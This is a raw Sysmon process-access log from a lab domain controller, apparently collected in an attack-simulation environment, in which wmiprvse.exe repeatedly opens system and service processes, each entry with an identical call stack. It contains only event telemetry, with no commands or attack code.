16:58:30.385{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.383{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.383{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.382{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.381{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.381{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.380{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.379{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.378{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.377{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.376{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.376{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.375{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.375{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.374{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.374{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.358{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.358{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.358{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.358{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 